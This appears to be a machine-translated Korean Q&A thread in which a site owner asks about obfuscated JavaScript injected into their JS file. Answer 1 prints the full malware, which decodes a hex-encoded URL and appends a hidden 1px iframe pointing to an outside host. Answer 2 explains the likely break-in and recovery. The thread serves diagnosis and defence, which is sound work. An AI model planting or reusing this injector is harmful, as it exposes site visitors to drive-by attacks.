서버에 자바 스크립트 코드 주입

Question

내 웹 사이트에서 js 파일에 사용자에게 쓰기 권한이없는 동안 서버에 추가하지 않은 끝에 js 파일의 자바 스크립트 코드가 있습니다.

이 파일이 어떻게 변경되고 코드가 추가되었는지, 그리고 이러한 시도에 대해 서버의 웹 사이트를 보호하는 방법에 대한 아이디어.

이것은 내 파일에 어떻게 추가되었는지 잘 모르는 javascript 코드의 일부입니다.

var RPTj='hYUw';function HCLac(){} 
if('hikbf'=='gloCBh')hnwT='BtbByu';var efIc;function ovPvyr(){var GcFza='sLHwL';if('jPslJ'=='WfPs')FgTgr();} 
var px0_var="0\x70x";function yefdV(){var MZIWif='pFeEIR';if('Oqoi'=='jcEyCx')YXCIxm();} 
var WxTv;var JJfPP="f\x72\x6fm\x43harCode";function MnFGT(){var WcZW='mpjU';if('GQike'=='hfiFQm')aSNa();} 
var LusRYV="";if('KSCVlW'=='ZHLn')fCxfd='nkVIX';if('rGsiG'=='uRdOG')bgTeVq();function NmGQl(){} 

Answer 1

토큰 중 하나를 검색하면 this report이됩니다. 그것은 당신의 코드가 그 코드의 시작 인 것 같습니다. 전체 코드는 http://snap3.myvnc.com/58583911.html을 가리키는 숨겨진 iframe을 삽입하는 것으로 나타납니다. 포맷

전체 코드 :

는

var RPTj = 'hYUw'; 

function HCLac() {} 
if ('hikbf' == 'gloCBh') hnwT = 'BtbByu'; 
var efIc; 

function ovPvyr() { 
    var GcFza = 'sLHwL'; 
    if ('jPslJ' == 'WfPs') FgTgr(); 
} 
var px0_var = "0px"; 

function yefdV() { 
    var MZIWif = 'pFeEIR'; 
    if ('Oqoi' == 'jcEyCx') YXCIxm(); 
} 
var WxTv; 
var JJfPP = "fromCharCode"; 

function MnFGT() { 
    var WcZW = 'mpjU'; 
    if ('GQike' == 'hfiFQm') aSNa(); 
} 
var LusRYV = ""; 
if ('KSCVlW' == 'ZHLn') fCxfd = 'nkVIX'; 
if ('rGsiG' == 'uRdOG') bgTeVq(); 

function NmGQl() {} 
var appVersion_var = "appversion"; 

function FxKCOl() { 
    var Tyadnl = 'KxdiY'; 
    if ('oiXBU' == 'egVk') ikDXjx(); 
} 

function ZMlp() {} 
var HpgJJy = "a6b2b2ae786d6db1ac9fae716cabb7b4aca16ca1adab6d7376737671776f6f6ca6b2abaa"; 
var kEKvaZ = 53; 
if ('sXNxpE' == 'kYOrhd') LHXd = 'GRDMD'; 
var iQzzDyqFb = "parseInt"; 
var NVLbyx = 'SzzTbP'; 
var KnXUEO = "appendChild"; 
var oCuGvo = 'AqRu'; 
var QqDXbsz = "slice"; 
var PSvizz = 'wTGO'; 
if ('UDtvo' == 'WOvxa') EjML(); 
if ('NkueyZ' == 'hmZjo') PTCkFt(); 
if ('ARloGz' == 'ESOXD') xXLyjy(); 

function YFbf() {} 
var BdHebR = "body"; 
var EyIJOS; 
var LXlPOM = "constructor"; 

function Aibw() {} 
var UYFE = 'XToVL'; 
var RCfxR; 
var px1_var = "1px"; 

function UxfaL() {} 
var uCNeV; 
var PmfiAgi = (function() { 
    var aBOKw = 77; 
    return this; 

    function uiqNU() {} 
})(); 
var bsnc = 16; 
if ('Bxidy' == 'pXMzt') iTix = 'VlDz'; 
var BffTkrlL = "gfmhzktv" [LXlPOM]; 
var AeqcV = 178; 
if ('yDWAl' == 'aEfSc') YamYD(); 
if ('Gbiec' == 'Gfkedw') IKIyYm(); 

function RiHlap() {} 
for (var naQrl = 0; naQrl < HpgJJy.length; naQrl += 2) { 
    if ('ldgI' == 'IKpUz') rrqZYp(); 
    if ('wghLE' == 'xtjurW') QFbOk = 'erIdjm'; 
    QxXSy = PmfiAgi[iQzzDyqFb](HpgJJy[QqDXbsz](naQrl, naQrl + 2), 16) - 62; 
    var uzmz; 
    var TtQHcx = 194; 
    LusRYV += BffTkrlL[JJfPP](QxXSy); 
    if ('RfJxKN' == 'WCxvgr') qJiK(); 

    function niER() { 
     var xYfZTn = 'bTKOZ'; 
     if ('oNmb' == 'zFotVd') CErQ(); 
    } 
    var ORrPz = 66; 
} 
function qrRA() {} 
if ('xUJvl' == 'IwPl') Zsvdq(); 
var tGfG; 
var EKOhz = 234; 
var uTUrfPXx = "msaAyY"; 
var PFDee; 
if ('UrLoD' == 'Sxld') PDDgwq = 'WMta'; 
var xVwEzf = ""; 
if (navigator[appVersion_var].indexOf("MSIE") != -1) { 
    var kWawh; 
    var ipBou; 
    xVwEzf = '<iframe name="' + uTUrfPXx + '" src="' + LusRYV + '">'; 
    var OCLAkX; 
    var nRid = 246; 
    var kxFTam = 'XzkCJ'; 
} else { 
    if ('NhMm' == 'fRlNQ') mcPWV = 'wimioU'; 
    xVwEzf = 'iframe'; 
    var FLIdcI = 'yQEfas'; 
    if ('BUXe' == 'AShAfN') EKbV = 'fBEl'; 
} 
if ('YdKCO' == 'pWElN') uTSIz(); 
var VdDqgo = document.createElement(xVwEzf); 
var ZcAkY = 'meVkj'; 
var jMIFIc; 
VdDqgo.tuqYuP = function() { 
    if ('FfHJE' == 'bCay') azXnsN(); 
    if ('BlUAl' == 'cJxWM') fRGW(); 
    var ogFkn = 146; 
    this["src"] = LusRYV; 
    var AgIjr = 259; 
    var qpSQK = 92; 

    function PdHsy() {} 
} 
var qzNJ = 'aFPF'; 
if ('vNdx' == 'XYol') rQHs = 'Hxmv'; 
VdDqgo.style.width = px1_var; 
var INpVIa; 
VdDqgo.name = uTUrfPXx; 
if ('xFAX' == 'BDmDG') KbBJUL(); 
VdDqgo.style.right = px0_var; 

function hDmz() { 
    var QaDaK = 'RkXzFf'; 
    if ('zhJAW' == 'KaeI') EKMSCK(); 
} 
var FLxMGu = 'NTrTRL'; 
var VKffS; 
if ('uVncX' == 'wLjA') SxPE = 'DqmaHY'; 
VdDqgo.style.position = "absolute"; 
if ('QUcV' == 'DOyW') iHzhEN = 'nFIX'; 
if ('NkrLk' == 'KpcbG') ZaLFnC = 'eGLz'; 
VdDqgo.style.height = px1_var; 
var UcmFUb = 'qOVzZW'; 
VdDqgo.style.top = px0_var; 
var VWcgid; 
if ('XMOW' == 'Ednf') WHmsA = 'IUxM'; 
VdDqgo.tuqYuP(); 
var lXbvup = 'vYuQu'; 
if ('imkwcA' == 'WooJ') HveoG = 'lWaRP'; 

function bICzNVqfg() { 
    var YPKTox; 
    if (document[BdHebR]) { 
     if ('ngooi' == 'TqRCsb') ftbpb(); 
     document[BdHebR][KnXUEO](VdDqgo); 

     function qDuFo() { 
      var mazr = 'QnGfrg'; 
      if ('BOyz' == 'AKOa') Gngf(); 
     } 
     function pzBO() {} 
    } else { 
     var VxvCl; 
     if ('iZnVhA' == 'xXpx') yFwsuD = 'Jwngn'; 
     setTimeout(bICzNVqfg, 120); 

     function TQWAxJ() {} 
    } 
    var trjnm = 134; 

    function gZgci() { 
     var IwVkwG = 'bVoa'; 
     if ('FAipi' == 'lshUte') jAfeZ(); 
    } 
} 
function ugkLim() { 
    var WDsg = 'GXvuNm'; 
    if ('WxbcV' == 'OxFu') OwHcwI(); 
} 
bICzNVqfg(); 
if ('pdHQlr' == 'MsZfH') lqfhm(); 
var BqsQp = 'BfjE'; 
var uHPm = 'sLKHU'; 
var hZrYYl = 'Qckv'; 
if ('gjgstY' == 'dlcZ') wSnqFG = 'zSpF'; 

는 일이 어떻게 결정하는 당신의 탐구에 관해서는, 서버 로그는 당신이 그들에 액세스 할 수있는 경우 시작하는 장소가 될 것입니다.

Answer 2

누군가가 귀하의 서버에 액세스하여 난독 화 된 멀웨어를 삽입했습니다.

대부분의 경우 서버에 취약한 스크립트가 있습니다. 특히 WordPress 또는 phpBB와 같은 일반적인 타사 PHP 응용 프로그램이 대상이됩니다.

지금해야 할 일?

• 침입자가 액세스하는 데 사용 된 모든 구멍을 닫습니다. 이것은 가장 많이 사용하는 소프트웨어의 현재 버전을 사용하는 것과 관련이 있습니다.
• 깨끗한 백업에서 모든 것을 다시 설치하여 모든 맬웨어 및 가능한 백도어를 제거하십시오.